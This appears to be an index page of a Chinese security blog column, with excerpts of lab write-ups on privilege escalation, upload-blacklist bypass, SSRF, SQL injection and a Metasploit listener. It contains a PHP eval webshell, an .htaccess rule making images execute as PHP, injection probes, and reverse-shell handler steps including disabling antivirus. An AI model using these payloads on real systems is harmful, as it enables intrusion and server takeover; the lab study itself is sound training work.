漏洞原理及复现
各种的漏洞原理及复现
Starry丶丶
这个作者很懒,什么都没留下…
展开
-
Pikachu漏洞平台之越权
水平越权 A用户和B用户属于同一级别用户,但各自不能操作对方个人信息。A用户如果越权操作B用户个人信息的情况称为水行越权操作 三个用户 lucy/lili/kobe 密码都为123456 1.登录Lucy用户 2.可以通过修改username值进行水平越权 垂直越权 1.登入超级用户admin,发现有修改的权限 2.登入pikachu用户,发现只能看不能修改 3.登入超级用户,进行抓包,查看cookie值 4.登入普通用户查看cookie值 5.登入普通用户进行抓包,复制cookie值,然后把包原创 2022-04-26 18:20:37 · 206 阅读 · 0 评论 -
黑名单绕过
在很多时候有限制文件上传的类型,而黑名单ban了很多相关的后缀,如果没有警用.htaccee那么就能触发getshell .htaccess可以把.jpg解析成php AddType application/x-httpd-php .jpg 先上传.htaccess文件,但是要修改后缀来绕过前端验证,在通过抓包修改回来 再上传jpg的文件,其实是将php一句话木马的文件改为jpg后缀 PHP: <?php @eval($_POST['404']);?> 用蚁剑连接 http原创 2022-04-20 11:31:51 · 883 阅读 · 0 评论 -
SSRF漏洞
x.x.x.x:8080 - 判断 SSRF 是否存在 能够对外发起网络请求的地方,就可能存在 SSRF。首先看下目标站点的功能,获取站点快照: 先尝试获取外网 URL 试试看,测试一下经典的 百度 robots.txt: https://www.baidu.com/robots.txt 测试成功,网站请求了baidu的robots.txt文件,并将请求页面的内容回显到了网站前端中。接下来尝试获取内网URL看看,测试请求127.0.0.1看看有什么反应: 127.0.0.1 测试依然成功,网站请求原创 2022-03-28 11:55:20 · 5000 阅读 · 0 评论 -
上传木马后门
1.进入监听模块 use exploit/multi/handler 2.修改LPORT和LHOST、payload参数 set payload windows/x64/meterpreter/reverse_tcp 3.run -j 4.监听 5.用xshell连接虚拟机,输入命令:sz 后门名称,即可下载到本机中(要把电脑管家关闭,不然会被拦截删除) 6.用蚁剑打开,拖进去 ...原创 2022-04-20 10:47:58 · 560 阅读 · 0 评论 -
Union注入攻击
1.判断注入点 主要是判断两个条件 1.我们传入的参数是否可控 2.我们传入的参数能否在数据库执行 ?id=1' ?id=1' and 1=1 --+ ?id=1' and 1=2 --+ 尝试单引号注入,发现报错信息 http://192.168.183.150:8081/Less-1/?id=1%27 将单引号闭合后,页面返回正常 http://192.168.183.150:8081/Less-1/?id=1%27%20and%201=1%20--+ 2.查询字段 判断字段个数 ?id=1原创 2022-04-21 11:38:19 · 1965 阅读 · 0 评论